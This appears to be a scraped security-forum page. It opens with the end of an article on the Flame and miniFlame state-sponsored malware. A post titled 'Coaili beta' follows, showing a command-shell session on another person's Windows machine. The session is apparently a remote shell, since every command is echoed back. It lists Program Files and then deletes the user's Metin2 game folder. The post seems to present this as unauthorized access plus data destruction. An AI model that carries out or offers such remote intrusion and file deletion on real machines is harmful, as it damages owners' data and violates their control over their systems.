the other modules being used by the malware controllers. Changes can be introduced as upgrades to functionality, fixes, or simply to evade security products.” The Kaspersky team proposing the result of its investigation on miniFlame malware used the words “cyber-weapon factory”, evidencing that these agent could also act for offensive purposes by simply loading a specific module. The authors of Flame have, according the results of the analysis, created dozens of different agents, and many of them are probably yet to be discovered. The result of analysis proposed by Kaspersky experts revealed that the projects started earlier than 2010 contrary to when believed, highlighting the great complexity of the encryption used. The information gathered by malware in fact are encrypted on the server and only the attackers can read it. Concluding, Flame was just a part of a state-sponsored project; it’s quite possible that similar projects are still ongoing and what is singular in my opinion is their ability to remain hidden during a long period, a characteristic that makes these agents very dangerous. Flame represents a milestone in the concept of cyber warfare. The security firms have been able to analyze the detected instances, but the modular structure led them to believe that it is considerable a work in progress with unpredictable evolution. References The Flame: Questions and Answers - Securelist Flamer: Highly Sophisticated and Discreet Threat Targets the Middle East | Symantec Connect Community Flame fallout: Microsoft encryption deadline looms Tuesday - CSO Online - Security and Risk New Investigation Points to Three New Flame-Related Malicious Programs: At Least One Still in the Wild | Business Wire miniFlame aka SPE: "Elvis and his friends" - Securelist Pierluigi Paganini is co-author of the newly-published e-book, The Deep Dark Web, available through Amazon and here. Sursa InfoSec Institute Resources - Flame: The Never Ending Story
  22. Wubi

    Coaili beta

    C:\Program Files>dir dir Volume in drive C is COAILII Volume Serial Number is 28CF-ADE5 Directory of C:\Program Files 10/18/2012 10:51 PM <DIR> . 10/18/2012 10:51 PM <DIR> .. 09/08/2012 05:29 AM <DIR> 1ClickDownload 09/01/2012 12:43 AM <DIR> AMD APP 08/31/2012 11:16 PM <DIR> Analog Devices 09/02/2012 03:56 AM <DIR> ATI 09/02/2012 03:58 AM <DIR> ATI Technologies 08/31/2012 10:55 PM <DIR> AVAST Software 09/03/2012 01:51 AM <DIR> Awakening - The Dreamless Castle 10/18/2012 04:19 PM <DIR> Common Files 08/31/2012 10:16 PM <DIR> ComPlus Applications 09/02/2012 04:14 AM <DIR> Conduit 09/03/2012 03:12 PM <DIR> CounterStrikev47 09/08/2012 05:11 AM <DIR> DAEMON Tools Lite 10/07/2012 02:18 AM <DIR> Easy-Hide-IP 10/01/2012 06:01 PM <DIR> Hide My IP 08/31/2012 10:32 PM <DIR> Intel 08/31/2012 10:45 PM <DIR> Internet Explorer 08/31/2012 11:44 PM <DIR> Java 08/31/2012 11:46 PM <DIR> Messenger 10/18/2012 02:55 PM <DIR> Metin2 09/22/2012 03:10 PM <DIR> Microsoft ActiveSync 08/31/2012 10:20 PM <DIR> microsoft frontpage 09/22/2012 03:13 PM <DIR> Microsoft Office 10/08/2012 12:49 PM <DIR> Microsoft.NET 08/31/2012 11:28 PM <DIR> Movie Maker 10/18/2012 10:51 PM <DIR> Mozilla Firefox 10/18/2012 10:51 PM <DIR> Mozilla Maintenance Service 10/08/2012 11:47 AM <DIR> MSBuild 08/31/2012 10:15 PM <DIR> MSN 08/31/2012 10:16 PM <DIR> MSN Gaming Zone 08/31/2012 10:18 PM <DIR> NetMeeting 08/31/2012 11:35 PM <DIR> Online Services 09/01/2012 12:09 AM <DIR> Outlook Express 09/02/2012 04:19 AM <DIR> Pando Networks 10/08/2012 11:47 AM <DIR> Reference Assemblies 08/31/2012 11:49 PM <DIR> Skype 10/18/2012 09:49 PM <DIR> Steam 09/21/2012 11:19 AM <DIR> SweetIM 09/21/2012 11:52 PM <DIR> TeamSpeak 3 Client 08/31/2012 11:53 PM <DIR> TuneUp Utilities 2009 09/02/2012 04:13 AM <DIR> uTorrent 09/20/2012 01:03 PM <DIR> Valve 08/31/2012 11:39 PM <DIR> Webteh 08/31/2012 11:46 PM <DIR> Winamp 08/31/2012 11:44 PM <DIR> Windows Media Player 08/31/2012 10:15 PM <DIR> Windows NT 09/01/2012 12:40 AM <DIR> WinRAR 08/31/2012 10:20 PM <DIR> xerox 08/31/2012 11:36 PM <DIR> Yahoo! 09/08/2012 05:31 AM <DIR> Yontoo 0 File(s) 0 bytes 51 Dir(s) 11,732,324,352 bytes free C:\Program Files> C:\Program Files>del Metin2 del Metin2 C:\Program Files\Metin2\*, Are you sure (Y/N)? Y Y C:\Program Files>
×
×
  • Create New...